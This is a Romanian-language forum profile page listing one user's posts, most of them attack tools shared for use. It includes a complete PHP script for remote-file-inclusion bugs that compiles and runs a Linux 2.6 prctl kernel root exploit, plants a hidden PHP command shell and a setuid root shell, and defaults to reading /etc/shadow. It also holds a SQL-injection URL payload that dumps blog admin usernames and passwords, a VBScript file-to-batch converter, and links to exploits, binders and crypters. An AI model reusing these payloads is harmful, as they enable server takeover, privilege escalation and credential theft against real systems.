alexcargo
Active Members-
Posts
122 -
Joined
-
Last visited
Recent Profile Visitors
The recent visitors block is disabled and is not being shown to other users.
alexcargo's Achievements
Newbie (1/14)
10
Reputation
-
dupa cum spune si titlu converteaza orice in .bat
-
<?php /* Kernel Exploiter for use in RFI bugs. */ set_time_limit(0); if(isset($_POST['exploit_it'])) { if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) { if($_POST['compiler'] == "none") { echo '<div align="center"><h4>No compiler found! Can not continue.</h4></div>'; end; } $cc = $_POST['compiler']; $prctl = '#!/bin/sh cat > /tmp/getsuid.c << __EOF__ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); sleep(120); } __EOF__ cat > /tmp/s.c << __EOF__ #include<stdio.h> main(void) { setgid(0); setuid(0); if (getuid() == 0) { printf("\n[+] We have root!\n\n" ); system("/bin/sh"); system("$_POST[cmd]"); '; if(!stristr($_POST['shell'],"could not be found")) { $prctl .= 'system("cp /bin/ash '.$_POST['shell'].'");'; } $prctl .= 'system("rm -rf /tmp/s"); system("rm -rf /etc/cron.d/core*"); system("exit"); } else { printf("\n[-] Failed.\n\n" ); system("rm -rf '.$_ENV["TMPDIR"].'/s"); } return 0; } __EOF__ '; $phpwrapper = '<?php if(isset($_GET[cmd])) { echo "<pre>"; echo passthru("'.$_POST['shell'].' -c \"$_GET[cmd]\""); echo "</pre>"; } ?>'; echo "<pre><div align='center'>"; $h = fopen("/tmp/a.sh", "w"); fwrite($h,$prctl); fclose($h); $handle = fopen($_POST['php'], "w"); fwrite($handle, $phpwrapper); fclose($handle); echo "Building exploit.... "; echo passthru("sh /tmp/a.sh"); echo passthru("$cc -o /tmp/s /tmp/s.c"); echo passthru("$cc -o /tmp/getsuid /tmp/getsuid.c"); echo "Running exploit...waiting about 4 minutes to see if exploit worked "; echo passthru("/tmp/getsuid"); echo passthru("/tmp/s"); echo "Cleaning up "; echo passthru("rm -rf /tmp/getsuid*"); echo passthru("rm -rf /tmp/s.c"); echo passthru("rm -rf /tmp/a.sh"); echo "Done! </div> </pre>"; } else { echo "Kernel version IS NOT 2.6.x or is a version known to not work: ".php_uname(); } } else { ?> <div align="center"> <h4>PHP Attack Script</h4> <h5><?php echo php_uname(); ?></h5> <pre><div align="center"> Checking for temp Directory.........<?php echo $_ENV["TMPDIR"]."\n"; ?> Checking for cc or gcc............<?php $path = explode(":",$_ENV["PATH"]); $gotcc = FALSE; $gotgcc = FALSE; foreach($path as $dir) { if(is_file($dir."/cc") && $gotgcc == FALSE && $gotcc == FALSE) { $gotcc = TRUE; $pathtocc = $dir."/cc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } elseif($gotcc == FALSE && $gotgcc == FALSE && is_file($dir."/gcc")) { $gotgcc = TRUE; $pathtogcc = $dir."/gcc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } } if($gotcc == FALSE && $gotgcc == FALSE) { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } ?> Checking for execute permissions..<?php $h = fopen("/tmp/test.sh","w"); fwrite($h,"#!/bin/sh"); fclose($h); system("sh /tmp/test.sh",$returnval); if($returnval == 0) { echo '[ <font color="#00CC00">OK</font> ]'."\n"; } else { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } passthru("rm -rf /tmp/test.sh"); ?> </pre></div> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <table border="0" cellspacing="0"> <tr> <td><div align="right">Exploit:</div></td> <td> <select name="exploit"> <option selected="selected">Prctl 2.6.x exploit</option> </select> </td> </tr> <tr> <td><div align="right">Location and name for root shell:</div></td> <td><input type="text" name="shell" size="50" value="<?php if(file_exists("/bin/ash")) { echo getcwd()."/.ash"; } elseif(file_exists("/bin/zsh")) { echo getcwd()."/.zsh"; } else { echo "/bin/ash or /bin/zsh could not be found!"; } ?>"/></td> </tr> <tr> <td><div align="right">Location and name for php shell wrapper: </div></td> <td><input type="text" name="php" size="50" value="<?php echo getcwd()."/.shell.php" ?>" /></td> </tr> <tr> <td><div align="right">Commands to perform while root seperate multiple commands with ; : </div></td> <td><input type="text" name="cmd" size="50" value="cat /etc/shadow" /></td> </tr> </table> </div> <div align="center"> <input type="hidden" name="compiler" value="<?php if(isset($pathtocc)) { echo $pathtocc; } elseif(isset($pathtogcc)) { echo $pathtogcc; } else { echo 'none'; } ?>" /> <input type="hidden" name="exploit_it" value="doit" /> <input name="submit" type="submit" value="Submit" /> After pressing submit it may take up to 4 minutes for the page to load depending on exploit. This is due to the exploit being run. If exploit fails the system may be patched or kernel may not be vuln. </div> </form> <?php } ?>
-
mersi ping dar eu am gasit chestia asta nu facuta de mine uni au facu phpshell asta si ia zis asa milw0rm nu e official dar in alte parti pe alte forumuri lumea imi sare in cap dar ei nu inteleg bine cuvantul sharing ma rog nu dau 2 bani pe ei.
-
Are you aware of all the devices – USB sticks, CDs, floppies, smartphones, MP3 players, handhelds, iPods, digital cameras – that have been connected to your network? As an administrator, do you know how many employees have been using or are using portable storage devices at the moment? Monitoring your network for these devices is not only time-consuming but nearly impossible to do manually. http://www.endpointscan.com/
-
http://www.mytempdir.com/1314256 misto imi place :wink: Enjoy
-
Google dork inurl:/blog/js.asp http://www.site.com/blog/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1
-
Exploitu 1 http://www.mytempdir.com/1314191 Exploitu 2 http://www.mytempdir.com/1314292 Enjoy :wink:
-
on error resume next set arg=wscript.arguments if arg.count=0 then wscript.quit with CreateObject("ADODB.Stream") .type=1:.open:.loadfromfile arg(0):bs=.read:l=.size:.close end with if err.number<>0 then wscript.quit set fso=CreateObject("Scripting.FileSystemObject") with fso.opentextfile(arg(0)&".bat",2,true) if err.number<>0 then wscript.quit .writeline "@echo bs=_>xx.vbs" for k=1 to l step 129 .write "@echo """ .write b64b(midb(bs,k,129)) .writeline """+_>>xx.vbs" next .writeline "@echo """":set rs=CreateObject(""ADODB.Recordset"")>>xx.vbs" .writeline "@echo set ado=CreateObject(""ADODB.Stream"")>>xx.vbs" .writeline "@echo l=len(bs):ss="""":for k=1 to l step 4096:ss=ss+ub64(mid(bs,k,4096)):next:l=len(ss)>>xx.vbs" .writeline "@echo rs.fields.append ""b"",205,l/2:rs.open:rs.addnew:rs(""b"")=ss+chrb(0):rs.update>>xx.vbs" .writeline "@echo ado.mode=3:ado.type=1:ado.open:ado.write rs(""b"").getchunk(l/2)>>xx.vbs" .writeline "@echo ado.savetofile """+fso.getfilename(arg(0))+""",2:ado.close>>xx.vbs" .writeline "@echo function ub64(s):dim t(4),b(3):ub64="""":n=len(s):r=2 >>xx.vbs" .writeline "@echo if n mod 4^<^>0 then exit function:end if:for i=1 to n step 4:for j=0 to 3 >>xx.vbs" .writeline "@echo a=asc(mid(s,i+j,1)):if a=43 then:a=62:else if a=47 then:a=63:else if a^>47 and a^<58 then:_>>xx.vbs" .writeline "@echo a=a+4:else if a=61 then:a=0:if r=2 then r=j-2:end if:else if a^>64 and a^<91 then:_>>xx.vbs" .writeline "@echo a=a-65:else if a^>96 and a^<123 then:a=a-71:else:exit function:_>>xx.vbs" .writeline "@echo end if:end if:end if:end if:end if:end if:t(j)=a:next>>xx.vbs" .writeline "@echo b(0)=t(0)+t(1)*64 mod 256:b(1)=t(1)\4+t(2)*16 mod 256:b(2)=t(2)\16+t(3)*4 >>xx.vbs" .writeline "@echo for j=0 to r:if b(j)^<16 then ub64=ub64+""0"":end if:ub64=ub64+hex(b(j))>>xx.vbs" .writeline "@echo next:next:end function>>xx.vbs&&cscript.exe //nologo xx.vbs&del xx.vbs" end with const b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" function b64b(bin) b64b="" n=lenb(bin) for i=1 to n step 3 a=ascb(midb(bin,i,1)) b64b=b64b+mid(b64,a mod 64+1,1) if i b=ascb(midb(bin,i+1,1)) b64b=b64b+mid(b64,(a\64+b*4)mod 64+1,1) if i+1 c=ascb(midb(bin,i+2,1)) b64b=b64b+mid(b64,(b\16+c*16)mod 64+1,1) b64b=b64b+mid(b64,c\4+1,1) else b64b=b64b+mid(b64,b\16+1,1) b64b=b64b+"=" end if else b64b=b64b+mid(b64,a\64+1,1) b64b=b64b+"==" end if next end function copiatil intr-un fisier text si salvati ca Any2Bat.vbs sau cu ce nume doriti
-
aici este video tutorialul http://thinstall.com/demos/vs_intro.zip ENjoy
-
un un protector pe http://www.mytempdir.com/1300600
-
un binder plus codu sursa http://www.mytempdir.com/1300595
-
un binder http://www.mytempdir.com/1300593
-
bun cryptor http://www.mytempdir.com/1300591